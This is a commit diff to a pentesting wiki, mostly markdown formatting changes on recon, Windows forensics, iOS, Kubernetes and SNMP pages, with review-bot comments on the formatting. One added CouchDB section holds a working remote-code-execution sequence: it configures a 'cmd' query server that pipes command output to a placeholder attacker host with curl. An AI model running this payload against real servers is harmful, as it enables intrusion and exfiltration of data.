GitBook: [master] 7 pages and 8 assets modified

This commit is contained in:
CPol 2021-05-25 23:07:25 +00:00 committed by gitbook-bot
parent 6cd7d66ee5
commit fd5d0989f3
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
12 changed files with 86 additions and 77 deletions


@ -25,8 +25,8 @@ An autonomous system number \(**ASN**\) is a **unique number** assigned to an **
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.
****You can search by **company name**, by **IP** or by **domain** in [https://bgp.he.net/](https://bgp.he.net/).
Depending on the region of the company this links could be useful to gather more data: [AFRINIC](https://www.afrinic.net/) \(Africa\), [Arin](https://www.arin.net/about/welcome/region/)\(North America\), [APNIC](https://www.apnic.net/) \(Asia\), [LACNIC](https://www.lacnic.net/) \(Latin America\), [RIPE NCC](https://www.ripe.net/) \(Europe\). Anyway, probably all the **useful information** \(IP ranges and Whois\) **appears already in the first link**.
**\*\*You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net/)**.
Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net/) **\(Africa\),** [**Arin**](https://www.arin.net/about/welcome/region/)**\(North America\),** [**APNIC**](https://www.apnic.net/) **\(Asia\),** [**LACNIC**](https://www.lacnic.net/) **\(Latin America\),** [**RIPE NCC**](https://www.ripe.net/) **\(Europe\). Anyway, probably all the** useful information **\(IP ranges and Whois\)** appears already in the first link\*\*.
```bash
#You can try "automate" this with amass, but it's not very recommended
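Review bot: the replacement lines invert the bold markup and should be reverted to the previous two lines. `**\*\*You can search by** company name**, by** IP **or by** domain **in**` closes the emphasis after "search by", so the connecting words are bolded while the terms that matter (company name, IP, domain) are plain, and the escaped `\*\*` at the start and the `\*\*.` at the end of the second line will render as literal asterisks. The old `You can search by **company name**, by **IP** or by **domain** in [https://bgp.he.net/](https://bgp.he.net/).` was already correct. While touching these lines, "this links could be useful" should read "these links could be useful".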
@ -40,8 +40,8 @@ You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4
### Looking for vulnerabilities
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts.
Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) ****or use services like **shodan** to find **open ports** and depending on what you find you should **take a look in this book to how to pentest several possible service running**.
Also, It could be worth it to mention that you can also prepare some **default username** and **passwords** lists and try to **bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) **\*\*or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**.
Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce\*\* services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
## Domains
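Review bot: the replacement lines mangle the emphasis: `**\*\*or use services like** shodan **to find** open ports` bolds the connecting text and leaves the key terms unbolded, and `bruteforce\*\*` leaves a literal `\*\*` in the rendered sentence; keep the previous lines (`or use services like **shodan** to find **open ports**`, `try to **bruteforce** services`). The surrounding wording also needs work in both versions: "take a look in this book to how to pentest several possible service running" reads better as "check this book for how to pentest the services you find", and "Also, It could be worth it to mention that" as "It is also worth mentioning that".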
@ -189,12 +189,12 @@ curl -s "https://rapiddns.io/subdomain/$1?full=1" \
You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following:
* http.html:”dev-int.bigcompanycdn.com”
* http.html:”https://dev-int-bigcompanycdn.com”
* http.html:”[https://dev-int-bigcompanycdn.com”](https://dev-int-bigcompanycdn.com”)
### DNS Brute force
Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) ****and ****[**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\).
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\).
For this action you will need some common subdomains lists like:
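Review bot: this change is a genuine cleanup (`****and ****` becomes `**and**`), but the sentence that follows is still inconsistent in both versions: four tools are listed, yet the text compares "the first one" with "the second one" and then says "always use gobuster", so the reader cannot tell which of massdns, gobuster, aiodnsbrute and shuffledns each remark refers to; name the tools explicitly. In the Shodan bullets in the context above, the quotes are curly (`”`), the third bullet has absorbed the closing `”` into the link target (`https://dev-int-bigcompanycdn.com”`), which yields a broken link, and the first bullet uses `dev-int.bigcompanycdn.com` while the other two use `dev-int-bigcompanycdn.com`; use straight quotes outside the URL and one consistent host name.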
@ -292,7 +292,7 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a
Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**.
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), ****[**Aquatone**](https://github.com/michenriksen/aquatone)**,** [**shutter**](https://shutter-project.org/downloads/) ****or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), **\*\*\[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) \*\***or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
## Recapitulation 1
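Review bot: the replacement line breaks two links. `**\*\*\[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**` escapes the link brackets and parentheses, so Aquatone and shutter will render as literal `[Aquatone](...)` text with stray asterisks rather than as links; restore the previous line's `[**Aquatone**](https://github.com/michenriksen/aquatone)` and `[**shutter**](https://shutter-project.org/downloads/)`. The empty `****` spans in the old line can simply be dropped.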
@ -355,5 +355,3 @@ As you can see there is a lot of different vulnerabilities to search for.
**If you have find any vulnerability thanks to this book, please reference the book in your write-up.**


@ -10,7 +10,7 @@ Inside this SQLite database you can find the `Notification` table with all the n
Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, executed applications...
The database resides in the path `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`
This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) ****which generates 2 files that can be opened with the tool [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **\*\*which generates 2 files that can be opened with the tool \[**TimeLine Explorer\*\*\]\([https://ericzimmerman.github.io/\#!index.md](https://ericzimmerman.github.io/#!index.md)\).
## Windows RecentAPPs
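Review bot: the replacement line breaks the TimeLine Explorer link: `\[**TimeLine Explorer\*\*\]\([https://ericzimmerman.github.io/\#!index.md](https://ericzimmerman.github.io/#!index.md)\)` escapes the link brackets, so the rendered text will show literal `[TimeLine Explorer**](...)`; keep the previous `[**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md)` and drop the empty `****` span before "which". In both versions "This database can be open with" should read "This database can be opened with".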
@ -186,7 +186,7 @@ You may be able to find them in the folder:
## Thumbnails
When a user access a folder and organised it using thumbnails, then a `thumbs.db` file is created. This db **stores the thumbnails of the images** of the folder even if they are deleted.
in winXP and WIn8-8.1 this file is created automatically. In Win7/Win10, it's created automatically if it's accessed via an UNC path \(\\IP\folder\...\).
in winXP and WIn8-8.1 this file is created automatically. In Win7/Win10, it's created automatically if it's accessed via an UNC path \(\IP\folder...\).
It is possible to read this file with the tool [**Thumbsviewer**](https://thumbsviewer.github.io/).
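Review bot: the replacement line corrupts the UNC path: `\(\IP\folder...\)` drops a backslash and the separator before the ellipsis, so the reader no longer sees a UNC form. A UNC path starts with two backslashes, and in markdown the backslashes are treated as escapes, so the safest presentation is a code span: `` `\\IP\folder\...` ``. The sentence itself also needs fixing in both versions: "in winXP and WIn8-8.1 this file is created automatically" should read "In Windows XP and Windows 8/8.1 this file is created automatically", "an UNC path" should be "a UNC path", and the context line "When a user access a folder and organised it using thumbnails" should be "When a user accesses a folder and organises it using thumbnails".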
@ -419,12 +419,12 @@ The Windows Registry Contains a lot of **information** about the **system and th
The files containing the registry are located in:
* %windir%\System32\Config\**SAM**: `HKEY_LOCAL_MACHINE`
* %windir%\System32\Config\**SECURITY**: `HKEY_LOCAL_MACHINE`
* %windir%\System32\Config\**SYSTEM**: `HKEY_LOCAL_MACHINE`
* %windir%\System32\Config\**SOFTWARE**: `HKEY_LOCAL_MACHINE`
* %windir%\System32\Config\**DEFAULT**: `HKEY_LOCAL_MACHINE`
* %UserProfile%\{User}\**NTUSER.DAT**: `HKEY_CURRENT_USER`
* %windir%\System32\Config\*_SAM\*_: `HKEY_LOCAL_MACHINE`
* %windir%\System32\Config\*_SECURITY\*_: `HKEY_LOCAL_MACHINE`
* %windir%\System32\Config\*_SYSTEM\*_: `HKEY_LOCAL_MACHINE`
* %windir%\System32\Config\*_SOFTWARE\*_: `HKEY_LOCAL_MACHINE`
* %windir%\System32\Config\*_DEFAULT\*_: `HKEY_LOCAL_MACHINE`
* %UserProfile%{User}\*_NTUSER.DAT\*_: `HKEY_CURRENT_USER`
From Windows Vista and Windows 2008 Server upwards there are some backups of the `HKEY_LOCAL_MACHINE` registry files in **`%Windir%\System32\Config\RegBack\`**.
Also from these versions, the registry file **`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`** is created saving information about program executions.
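Review bot: the replacement list breaks the emphasis on every hive name (`*_SAM\*_` renders as a stray `*_SAM*_` instead of a bold SAM) and drops the backslash in the NTUSER.DAT entry (`%UserProfile%{User}\*_NTUSER.DAT\*_`); revert to the previous six lines. Independently of this change, `%UserProfile%` already expands to the profile directory of the current user, so `%UserProfile%\{User}\NTUSER.DAT` and the `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` path in the context line double up the user component; `%UserProfile%\NTUSER.DAT` and `%UserProfile%\AppData\Local\Microsoft\Windows\UsrClass.dat` would be accurate (the file is named UsrClass.dat, not USERCLASS.DAT).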
@ -455,5 +455,3 @@ In `SAM\Domains\Account\Users` you can obtain the username, the RID, last logon,
{% page-ref page="interesting-windows-registry-keys.md" %}


@ -110,7 +110,7 @@ Desktop Access:
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) ****and you will be able to find the **MAC time of the folder** and also the **creation date and modified date of the shellbag** which are related with the **first time the folder was accessed and the last time**.
To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) **\*\*and you will be able to find the** MAC time of the folder **and also the** creation date and modified date of the shellbag **which are related with the** first time the folder was accessed and the last time\*\*.
Note 2 things from the following image:
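Review bot: the replacement line inverts the emphasis: `**\*\*and you will be able to find the** MAC time of the folder **and also the**` bolds the connecting text, leaves the terms plain, and ends with a literal `\*\*`; keep the previous line and drop its empty `****` span after the Shellbag Explorer link. "which are related with the first time the folder was accessed and the last time" reads better as "which correspond to the first and last time the folder was accessed".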
@ -131,8 +131,6 @@ Within this registry it's possible to find:
* The Device Class ID
* The volume name \(in the following images the volume name is the highlighted subkey\)
![](../../../.gitbook/assets/image%20%28489%29.png)
![](../../../.gitbook/assets/image%20%28479%29%20%281%29.png)
@ -141,8 +139,6 @@ Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and compar
![](../../../.gitbook/assets/image%20%28476%29.png)
With the previous information the registry `SOFTWARE\Microsoft\Windows Portable Devices\Devices` can be used to obtain the **`{GUID}`**:
![](../../../.gitbook/assets/image%20%28486%29.png)


@ -412,8 +412,8 @@ Check for possible couchbase databases in `/private/var/mobile/Containers/Data/A
iOS store the cookies of the apps in the **`Library/Cookies/cookies.binarycookies`** inside each apps folder. However, developers sometimes decide to save them in the **keychain** as the mentioned **cookie file can be accessed in backups**.
To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) ****or use **objection's** `ios cookies get`.
You can also use objection to **convert these files to a JSON** format and inspect the data.
To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) **\*\*or use** objection's **`ios cookies get`.
You can also use objection to** convert these files to a JSON\*\* format and inspect the data.
```bash
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json
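Review bot: the emphasis in the replacement is inverted and now spans two lines: `**\*\*or use** objection's` opens a bold run that is only closed by `You can also use objection to** convert these files to a JSON\*\*` on the next line, so the whole stretch in between renders bold and the `\*\*` sequences appear as literal asterisks; keep the previous two lines (`or use **objection's** \`ios cookies get\`` and `**convert these files to a JSON** format`). The context sentence "iOS store the cookies of the apps in ... inside each apps folder" should read "iOS stores each app's cookies in ... inside that app's folder".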
@ -505,7 +505,7 @@ You can also use `ios keychain dump` from [**Objection**](https://github.com/sen
#### **NSURLCredential**
**NSURLCredential** is the perfect class to **store username and password in the keychain**. No need to bother with NSUserDefaults nor any keychain wrapper.
****Once the user is logged in, you can **store** his username and password to the keychain:
**\*\*Once the user is logged in, you can** store\*\* his username and password to the keychain:
```swift
NSURLCredential *credential;
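Review bot: `**\*\*Once the user is logged in, you can** store\*\* his username` bolds the wrong part of the sentence and leaves literal asterisks; restore `Once the user is logged in, you can **store** his username and password to the keychain:`. The code block that follows is fenced as `swift`, but `NSURLCredential *credential;` is Objective-C pointer syntax, so the fence should be `objectivec`. In the context line, "No need to bother with NSUserDefaults nor any keychain wrapper" should be "no need to bother with NSUserDefaults or any keychain wrapper".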
@ -731,7 +731,7 @@ For **more information** about iOS cryptographic APIs and libraries access [http
The tester should be aware that **local authentication should always be enforced at a remote endpoint** or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) ****provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible \(and recommended\) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication.
The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) _\*\*_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible \(and recommended\) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication.
The **fingerprint ID** sensor is operated by the [SecureEnclave security coprocessor](https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf) and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced _Face ID_: which allows authentication based on facial recognition.
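Review bot: `_\*\*_provides` introduces an empty italic span plus escaped asterisks right after the Local Authentication framework link, which will render as stray characters; the previous `****provides` was itself an empty bold span, so the correct fix is simply `[**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) provides`. "extend an authentication dialog to a user" reads better as "present an authentication dialog to the user".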
@ -959,7 +959,7 @@ In order to check this issue using Burp, after trusting Burp CA in the iPhone, y
### Certificate Pinning
If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**
In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) ****or install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\*\*\*\*
In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) **\*\*or install \[**Burp Mobile Assistant_\*\]\(_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing%29\)\*\*\*
You can also use **objection's** `ios sslpinning disable`
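Review bot: the replacement line destroys the Burp Mobile Assistant link: `\[**Burp Mobile Assistant_\*\]\(_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing%29\)\*\*\*` nests escaped brackets, an italic marker and a `%29` inside the URL, so it renders neither as a link nor as readable text; restore `[**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)` and drop the trailing `\*\*\*\*` that the old line carried. The context sentence also needs fixing: "the application will only works if the certificate is the once expected to be" should be "the application will only work if the certificate is the expected one", and "Burp will serve it's own certificate" should be "its own certificate".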


@ -308,10 +308,31 @@ www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d
{"ok":true,"id":"zero","rev":"1-967a00dff5e02add41819138abb3284d"}
```
Request it in a view:
Request it in a view. The db will complain about headers, but if we work with it, we can get a bit further:
```text
www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' -H "Content-Type: application/json"
www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}'
{"error":"bad_request","reason":"Referer header required."}
www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}' -H "Referer: http://127.0.0.1:5984
{"error":"bad_request","reason":"Referer header must match host."}
www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}' -H "Referer: http://localhost:5984"
{"error":"bad_content_type","reason":"Content-Type must be multipart/form-data"}
www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}' -H "Referer: http://localhost:5984" -H "Content-Type: multipart/form-data"
{"error":"case_clause","reason":"undefined","ref":627893255}
```
At this point, I am stuck. An undefined “case\_clause” error wasnt too Googleable. And this isnt really a path for this box anyway. If you know why its breaking here, please let me know!
#### Summary with a different payload
```bash
curl -X PUT 'http://<target_ip>:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"id | curl http://<attacker_ip>:<port> -d @-"'
curl -X PUT 'http://<target_ip>:5984/testbed'
curl -X PUT 'http://<target_ip>:5984/testbed/whatever' -d '{"_id":"770855a97726d5666d70a22173005c77"}'
curl -X PUT http://<target_ip>:5984/testbed/_design/whatever -d '{"_id":"_design/test","views":{"anything":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
```
## Shodan
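Review bot: the added transcript is first-person narration ("At this point, I am stuck", "please let me know!") lifted from an external write-up (the `www-data@canape` prompt and the `0xdf:df` credentials show it is not this page's own work), yet the hunk adds no attribution or source link; cite the original write-up before the block, and restore the apostrophes lost on the way ("wasn't", "isn't", "it's breaking"). Two copy defects in the added lines: the third curl command's `-H "Referer: http://127.0.0.1:5984` is missing its closing double quote, and in the summary block the design document is PUT to `/testbed/_design/whatever` while its body declares `"_id":"_design/test"`, so the path and `_id` disagree; make them consistent with each other.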


@ -71,8 +71,6 @@ GET /apis/apps/v1/watch/deployments [DEPRECATED]
They open a streaming connection that returns you the full manifest of a Deployment whenever it changes \(or when a new one is created\).
{% hint style="danger" %}
The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
{% endhint %}
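Review bot: the two removed lines are not shown, so the change cannot be checked, but the context sentence in the hint should be corrected in passing: "The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`" reads as "The following `kubectl` commands only show how to list the objects; to see the data itself, use `describe` instead of `get`."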
@ -348,5 +346,5 @@ nmap-kube-discover
## References
{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}
{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" caption="" %}


@ -90,6 +90,7 @@ To **guess the community string** you could perform a dictionary attack. Check [
## Enumerating SNMP
It is recommanded to install the following to see whats does mean **each OID gathered** from the device:
```bash
apt-get install snmp-mibs-downloader
download-mibs
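Review bot: the context line "It is recommanded to install the following to see whats does mean **each OID gathered** from the device:" carries typos that this hunk could fix while it adds the blank line: "It is recommended to install the following packages to see what **each OID gathered** from the device means:".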
@ -104,13 +105,13 @@ snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
nmap --script "snmp* and not snmp-brute" <target>
```
Thanks to extended queries (download-mibs), it is possible to enumerate even more about the system with the following command :
Thanks to extended queries \(download-mibs\), it is possible to enumerate even more about the system with the following command :
```bash
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
```
**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** (IPv4 and **IPv6** address), Usernames, Uptime, Server/OS version, and **processes running** (may contain passwords)....
**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** \(IPv4 and **IPv6** address\), Usernames, Uptime, Server/OS version, and **processes running** \(may contain passwords\)....
## From SNMP to RCE
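Review bot: escaping the parentheses (`\(download-mibs\)`, `\(IPv4 and **IPv6** address\)`) is GitBook's serializer at work and is harmless, but the changed lines still carry their original defects: the space before the colon in "the following command :", the `-v X` in the snmpwalk command is an unexplained placeholder (the SNMP version, 1, 2c or 3, goes there, and the text should say so), the list "Usernames, Uptime, Server/OS version" capitalises items inconsistently with the rest of the sentence, and the trailing "...." should be a single ellipsis.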
@ -178,6 +179,3 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can
* snmpd.conf
* snmp-config.xml
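Review bot: the hunk header context reads "only allows some IPs to query the SMNP service"; it should be "the SNMP service". The three removed lines are not shown, so the rest of this hunk cannot be reviewed.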